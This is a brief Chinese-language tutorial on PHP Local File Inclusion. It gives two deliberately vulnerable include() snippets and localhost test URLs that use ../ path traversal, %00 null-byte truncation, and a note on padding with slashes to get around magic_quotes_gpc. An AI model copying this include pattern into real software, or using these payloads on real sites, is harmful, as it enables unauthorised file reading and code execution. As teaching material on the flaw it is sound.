LFI(本地包含)

 那么我们就直接实例吧。


Test1.php <?php  include("./test/".$test); ?>

测试代码:http://localhost/test1.php?test=../test2.txt  

Test2.php <?php  include("./test/".$test.".php"); ?>

测试代码:http://localhost/test2.php?test=../test2.txt%00  (利用00截断)


GPC为ON时%00会被转义 那么我们利用一定数量的/突破操作系统对文件名的长度限制来截断后面的字符串